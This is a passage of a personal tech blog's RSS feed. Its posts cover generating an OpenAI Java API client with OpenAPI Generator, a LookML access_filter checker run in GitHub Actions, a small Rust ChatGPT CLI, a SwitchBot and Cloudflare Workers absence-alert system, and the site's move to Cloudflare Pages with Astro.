&lt;p&gt;The experimentation highlighted the astonishing ease with which unstructured data processing, previously demanding specialized machine learning expertise, can now be implemented. Recent developments, like the &lt;a href=&quot;https://openai.com/blog/chatgpt-plugins#code-interpreter&quot;&gt;Code Interpreter&lt;/a&gt; by OpenAI, further simplify the implementation of such AI-enhanced service experiences, promising widespread adoption and continuous improvement in the field.&lt;/p&gt;
</content:encoded></item><item><title>Developing an OpenAI Java API Client</title><link>https://ainoya.dev/posts/openai-java-generated-client/</link><guid isPermaLink="true">https://ainoya.dev/posts/openai-java-generated-client/</guid><description>A look into the development of an OpenAI Java API client using the OpenAPI Generator.</description><pubDate>Mon, 08 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Last year in November, I took on the task of developing a Java API client for OpenAI&apos;s ChatGPT Assistant API, as there was a notable absence of such a tool for Java developers. The result of this endeavor is hosted on &lt;a href=&quot;https://github.com/ainoya/openai-java-generated-client&quot;&gt;GitHub - ainoya/openai-java-generated-client&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Utilizing OpenAI&apos;s API Specification&lt;/h2&gt;
&lt;p&gt;The project was inspired by OpenAI&apos;s publicly shared API specification on &lt;a href=&quot;https://github.com/openai/openai-openapi&quot;&gt;GitHub - openai/openai-openapi&lt;/a&gt;. This led me to explore the potential of automating the client generation using the &lt;a href=&quot;https://github.com/OpenAPITools/openapi-generator&quot;&gt;OpenAPI Generator&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Encountered Challenges&lt;/h3&gt;
&lt;h4&gt;Spec vs. Reality&lt;/h4&gt;
&lt;p&gt;A significant challenge arose from discrepancies between the OpenAI specification and its actual implementation. Mismatched response key names meant calling the API directly, comparing the actual responses, and patching the specification; the corrected spec is available at &lt;a href=&quot;https://github.com/ainoya/openai-java-generated-client/blob/main/openapi.yaml&quot;&gt;openapi.yaml&lt;/a&gt;. The Assistant API functions well now, though other parts may still require updates.&lt;/p&gt;
&lt;h4&gt;Mastering OpenAPI Generator Options&lt;/h4&gt;
&lt;p&gt;Deciphering the options available in &lt;code&gt;openapi-generator&lt;/code&gt; required thorough research and understanding, aided by the &lt;a href=&quot;https://openapi-generator.tech/docs/generators/java/&quot;&gt;official documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;The Effective Docker Command&lt;/h3&gt;
&lt;p&gt;Running the OpenAPI Generator in Docker proved most efficient. The finalized command for generating the client is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;docker run --rm -v ${PWD}:/local openapitools/openapi-generator-cli:v7.1.0 generate \
    -i /local/openapi.yaml --template-dir=/local/custom_template \
    -g java \
    --additional-properties=disallowAdditionalPropertiesIfNotPresent=false,artifactId=openai-java-generated-client,groupId=com.github.ainoya,invokerPackage=com.github.ainoya.client,modelPackage=com.github.ainoya.client.model,developerName=&quot;Naoki Ainoya&quot;,developerEmail=&quot;xxx&quot;,developerOrganization=&quot;ainoya.dev&quot;,developerOrganizationUrl=&quot;https://ainoya.dev&quot;,artifactVersion=0.0.3 \
    --api-package com.github.ainoya.openai.client.api \
    -o /local/ &amp;amp;&amp;amp; \
    ./gradlew test
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Auto-Generated Unit Testing&lt;/h3&gt;
&lt;p&gt;The OpenAPI Generator&apos;s capability to auto-generate unit tests was highly beneficial. The command includes running &lt;code&gt;./gradlew test&lt;/code&gt; after generation, enabling quick identification of any issues.&lt;/p&gt;
&lt;h2&gt;Opting for JitPack over GitHub Packages&lt;/h2&gt;
&lt;p&gt;While initially considering GitHub Packages, its constraints did not align with my usage requirements, so I opted for JitPack instead. The API client is available at &lt;a href=&quot;https://jitpack.io/#ainoya/openai-java-generated-client&quot;&gt;JitPack - ainoya/openai-java-generated-client&lt;/a&gt;. The deciding factor was that GitHub Packages requires a Personal Access Token (PAT) even for public packages, as elaborated in &lt;a href=&quot;https://github.com/orgs/community/discussions/25629&quot;&gt;GitHub Community Discussion #25629&lt;/a&gt;.&lt;/p&gt;
</content:encoded></item><item><title>Automating LookML Code Review with lkml and GitHub Actions</title><link>https://ainoya.dev/posts/lookml-test-lkml/</link><guid isPermaLink="true">https://ainoya.dev/posts/lookml-test-lkml/</guid><description>How to automate LookML code review using the lkml Python library and GitHub Actions.</description><pubDate>Sun, 07 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;In the world of data analytics, &lt;a href=&quot;https://cloud.google.com/looker/docs&quot;&gt;Looker&lt;/a&gt; has become an indispensable tool for many teams. Its core feature, LookML, allows users to define data models and manage projects efficiently through Git. This setup facilitates team development by enabling version control and collaborative work. However, as teams grow, ensuring adherence to specific LookML coding standards becomes increasingly challenging, especially during code reviews.&lt;/p&gt;
&lt;p&gt;A particularly useful tool in this context is &lt;a href=&quot;https://www.spectacles.dev/&quot;&gt;Spectacles&lt;/a&gt;, which assists in validating LookML code. Yet, there are times when teams require custom static analysis to enforce specific coding practices. This is where the &lt;a href=&quot;https://github.com/joshtemple/lkml&quot;&gt;&lt;code&gt;lkml&lt;/code&gt;&lt;/a&gt; Python library comes into play, providing an easy way to create custom static analysis scripts.&lt;/p&gt;
&lt;p&gt;For instance, consider a team wanting to enforce a consistent data protection policy across all LookML &lt;code&gt;explore&lt;/code&gt; definitions by using &lt;code&gt;access_filter&lt;/code&gt;. The &lt;code&gt;lkml&lt;/code&gt; library enables the creation of a Python script to check this automatically.&lt;/p&gt;
&lt;p&gt;Here&apos;s an example script that parses LookML files, identifies &lt;code&gt;explore&lt;/code&gt; definitions, and checks for the presence of specific &lt;a href=&quot;https://cloud.google.com/looker/docs/reference/param-explore-access-filter&quot;&gt;&lt;code&gt;access_filter&lt;/code&gt;&lt;/a&gt; settings:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Script to parse LookML and check for issues with access_filter
# To be used in CI
import lkml
import pprint
import glob

for lkml_file_path in glob.glob(&apos;**/*.lkml&apos;, recursive=True):
    with open(lkml_file_path) as file:
        print(&quot;reading: {}&quot;.format(lkml_file_path))
        result = lkml.load(file)
        if &apos;explores&apos; not in result:
            print(&quot;{} does not contain explore definitions. Skipping check for access_filter conditions.&quot;.format(lkml_file_path))
            continue
        else:
            print(&quot;{} contains explore definitions. Checking access_filter conditions.&quot;.format(lkml_file_path))

        for explore in result[&apos;explores&apos;]:
            print(&quot;Checking access_filter conditions for explore name: {}&quot;.format(explore[&apos;name&apos;]))
            try:
                access_filter = explore[&apos;access_filters&apos;][0]
                pprint.pprint(access_filter)
                if access_filter[&apos;user_attribute&apos;] != &apos;tenant_id&apos;:
                    raise Exception(&quot;Please specify user_attribute: tenant_id in access_filter conditions. There are issues with the scope of data exposure.&quot;)
            except KeyError:
                raise Exception(&quot;Please set access_filter conditions in explore. There are issues with the scope of data exposure.&quot;)
            print(&quot;ok&quot;)
&lt;/code&gt;&lt;/pre&gt;
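&lt;p&gt;For reference, an &lt;code&gt;explore&lt;/code&gt; that passes this check might look like the following (the filter field name is illustrative):&lt;/p&gt;

```lookml
# Hypothetical explore satisfying the tenant_id access_filter rule
explore: orders {
  access_filter: {
    field: orders.tenant_id
    user_attribute: tenant_id
  }
}
```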
&lt;p&gt;This script can be integrated into a continuous integration (CI) pipeline, offering a more efficient and reliable way to ensure coding standards than manual code reviews. For teams managing their code repositories on GitHub, this script can be easily incorporated into their workflow using GitHub Actions.&lt;/p&gt;
&lt;p&gt;Below is a sample GitHub Actions workflow definition that automates the execution of the script upon every push to the repository:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;name: lookml test

on:
  push:

jobs:
  lookml-test:
    name: lookml-test
    timeout-minutes: 10
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3.3.0
    - name: Set up Python
      uses: actions/setup-python@v4
      with:
        python-version: &quot;3.10&quot;
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install lkml
    - name: Test
      run: |
        python scripts/lkml_validator/test.py
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This setup not only saves time but also enhances the reliability of code reviews by automating the validation of &lt;code&gt;access_filter&lt;/code&gt; configurations in LookML files. It&apos;s a practical example of how tools like &lt;code&gt;lkml&lt;/code&gt; and GitHub Actions can streamline development processes in the data analytics domain.&lt;/p&gt;
</content:encoded></item><item><title>Exploring AI CLI Tool Development with Rust: GIGO</title><link>https://ainoya.dev/posts/gigo/</link><guid isPermaLink="true">https://ainoya.dev/posts/gigo/</guid><description>Garbage in, garbage out</description><pubDate>Sat, 06 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;In the dynamic world of software engineering, the integration of efficient tools can significantly streamline the workflow. With the advent of AI-powered solutions like ChatGPT, there&apos;s a growing need for accessible interfaces to interact with these systems. My recent project, a command-line interface (CLI) tool named GIGO, grew out of that need and doubled as my introduction to Rust programming.&lt;/p&gt;
&lt;h2&gt;The Genesis of GIGO&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Identifying the Need&lt;/strong&gt;: As a software engineer, I often found myself in situations where I needed quick, dummy inputs for testing or various tasks. A direct, terminal-based tool to interact with ChatGPT seemed like an ideal solution.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Why Rust?&lt;/strong&gt;: Despite having no prior experience with Rust, my curiosity to explore this language was the driving force behind this project. Rust, known for its safety and performance, seemed like a fitting choice for a tool that would interact with AI models.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Building GIGO&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The Project&lt;/strong&gt;: I embarked on creating GIGO, a minimalist CLI tool, which you can find on GitHub at &lt;a href=&quot;https://github.com/ainoya/gigo&quot;&gt;ainoya/gigo&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Functionality&lt;/strong&gt;: While GIGO&apos;s features are currently limited, it efficiently serves its primary function. Inspired by the phrase &quot;garbage in, garbage out,&quot; I chose this name to add a touch of humor. The tool allows users to input prompts via CLI, which then return responses from ChatGPT.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Usage Example&lt;/strong&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo &apos;Please write a short story about a robot who is trying to learn how to be a human.&apos; | gigo

Once upon a time, ...
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Reflections and Future Prospects&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Rust Experience&lt;/strong&gt;: Although I&apos;ve only scratched the surface of Rust&apos;s capabilities, I found its pattern matching and type-safe error handling to be particularly appealing. An example can be seen in the project&apos;s code (&lt;a href=&quot;https://github.com/ainoya/gigo/blob/ca51c240694db5df7382a4a19c457ce369f58b2f/src/main.rs#L29&quot;&gt;here&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GIGO&apos;s Potential&lt;/strong&gt;: Currently, GIGO interfaces solely with OpenAI&apos;s API. However, I believe enhancing its compatibility with various large language models could make it more versatile and interesting.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;My foray into developing GIGO has been both a learning curve and a step towards addressing a niche requirement in the software engineering domain. While it&apos;s a small-scale project, the potential for GIGO to evolve and integrate more features is something I look forward to exploring. This journey has not only provided me with a practical tool but also a valuable introduction to Rust programming.&lt;/p&gt;
</content:encoded></item><item><title>Absence Alert System using SwitchBot</title><link>https://ainoya.dev/posts/switchbot-absence-alert/</link><guid isPermaLink="true">https://ainoya.dev/posts/switchbot-absence-alert/</guid><description>Absence Alert System using SwitchBot Motion Sensor and Cloudflare Workers</description><pubDate>Wed, 03 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Enhancing Home Security with a Custom-Built Motion Detection Alert System using SwitchBot and Cloudflare Workers&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/switchbot-absence-alert/images/diagram.svg&quot; alt=&quot;Diagram&quot; /&gt;&lt;/p&gt;
&lt;p&gt;As smart home technologies evolve, the need for more sophisticated monitoring systems becomes apparent. While standard motion sensors, like those from SwitchBot, are great at detecting movement and triggering immediate actions, they often lack the capability to alert users about the absence of motion for extended periods. This is crucial in scenarios where non-activity can be as significant as activity, such as monitoring the well-being of elderly relatives or ensuring that a seldom-used space remains undisturbed.&lt;/p&gt;
&lt;p&gt;To address this, I built a system that combines SwitchBot&apos;s motion detection with Cloudflare Workers to alert on both motion and the absence of motion over extended periods, beyond the 30-minute limit of SwitchBot&apos;s default settings.&lt;/p&gt;
&lt;h2&gt;How the System Works&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Extended Absence Detection:&lt;/strong&gt; The SwitchBot sensors are excellent at motion detection, but they can&apos;t natively send alerts for periods of inactivity longer than 30 minutes. My system overcomes this by using Cloudflare Workers alongside the SwitchBot API to detect absence of motion over intervals longer than 30 minutes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Integration with Cloudflare Workers:&lt;/strong&gt; Upon detecting motion, the SwitchBot sensor triggers a webhook request to Cloudflare Workers. These Workers then log the time of the motion event in Cloudflare&apos;s Key-Value (KV) storage system.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Scheduled Checks and Notifications:&lt;/strong&gt; A scheduled Cloudflare Worker periodically checks the last recorded motion timestamp in the KV store. If it detects that no motion has been recorded for over 6 hours, it triggers a notification.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Utilizing Pushover for Alerts:&lt;/strong&gt; For sending notifications, I chose Pushover – a convenient app for sending push notifications to smartphones. It&apos;s ideal for personal systems where you want to integrate push notifications easily.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
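&lt;p&gt;The core of the scheduled check is a simple threshold comparison. The real implementation is JavaScript on Cloudflare Workers reading the last-motion timestamp from KV; the names in this Python sketch are illustrative:&lt;/p&gt;

```python
# Sketch of the scheduled Worker's absence check (illustrative names).
import time

ABSENCE_THRESHOLD_SECONDS = 6 * 60 * 60  # alert after 6 hours without motion

def should_alert(last_motion_epoch, now_epoch):
    """True when no motion has been recorded for longer than the threshold."""
    return (now_epoch - last_motion_epoch) > ABSENCE_THRESHOLD_SECONDS

now = time.time()
print(should_alert(now - 7 * 3600, now))  # seven silent hours: alert
print(should_alert(now - 1 * 3600, now))  # recent motion: no alert
```

&lt;p&gt;When the check fires, the Worker posts the notification to Pushover.&lt;/p&gt;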
&lt;h2&gt;Development and Resources&lt;/h2&gt;
&lt;p&gt;The implementation was guided by the official API documentation of SwitchBot (&lt;a href=&quot;https://github.com/OpenWonderLabs/SwitchBotAPI&quot;&gt;SwitchBot API&lt;/a&gt;) and Cloudflare Workers (&lt;a href=&quot;https://developers.cloudflare.com/workers/&quot;&gt;Cloudflare Workers Documentation&lt;/a&gt;). The ease of use of Cloudflare Workers, particularly for setting up web APIs and using the KV store for data persistence, made it an excellent choice for this project. The deployment process was streamlined thanks to well-organized Wrangler commands.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This project showcases how combining existing smart home devices with powerful cloud services like Cloudflare Workers can result in highly functional and customized home security solutions. The ability to monitor both presence and absence of motion opens up new avenues for home monitoring, ensuring peace of mind when it comes to the safety and security of our homes and loved ones.&lt;/p&gt;
&lt;p&gt;The implementation details and code are available on &lt;a href=&quot;https://github.com/ainoya/switchbot-absence-alert&quot;&gt;my GitHub repository&lt;/a&gt;. I welcome fellow enthusiasts to explore, fork, and adapt this system to their requirements.&lt;/p&gt;
</content:encoded></item><item><title>My first post</title><link>https://ainoya.dev/posts/my-first-post/</link><guid isPermaLink="true">https://ainoya.dev/posts/my-first-post/</guid><description>This is my first post</description><pubDate>Sat, 30 Dec 2023 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I wanted to share a small update about some changes I&apos;ve made to my website recently.&lt;/p&gt;
&lt;h2&gt;Switching Domains to Cloudflare&lt;/h2&gt;
&lt;p&gt;I&apos;ve moved my domains, ainoya.dev and ainoya.io, over to Cloudflare. This is a step towards improving the overall performance of my website.&lt;/p&gt;
&lt;h2&gt;Hosting with Cloudflare Pages&lt;/h2&gt;
&lt;p&gt;In addition to the domain migration, my website is now hosted on Cloudflare Pages. This change is primarily for ease of maintenance and better integration with my existing setup. I&apos;m hoping that this move will make the website more efficient and user-friendly.&lt;/p&gt;
&lt;h2&gt;Built with Astro&lt;/h2&gt;
&lt;p&gt;For the website&apos;s framework, I&apos;ve chosen Astro. I&apos;m using the Cactus theme from &lt;a href=&quot;https://astro.build/themes/&quot;&gt;Astro&apos;s collection&lt;/a&gt;, which can be found here: &lt;a href=&quot;https://github.com/chrismwilliams/astro-theme-cactus&quot;&gt;Cactus Theme&lt;/a&gt; on GitHub. It&apos;s a simple yet effective theme that suits the content and structure of my site.&lt;/p&gt;
&lt;h2&gt;Content Focus&lt;/h2&gt;
&lt;p&gt;Going forward, the blog will mainly feature posts about things I learn in the tech field. This could include new programming concepts, insights into different technologies, or updates on personal projects. The idea is to share knowledge and experiences in a straightforward and accessible way.&lt;/p&gt;
&lt;p&gt;I&apos;m looking forward to this new phase and hope you find the posts informative and interesting. Feel free to reach out if you have any thoughts or questions.&lt;/p&gt;
&lt;p&gt;Thank you for reading!&lt;/p&gt;
</content:encoded></item></channel></rss>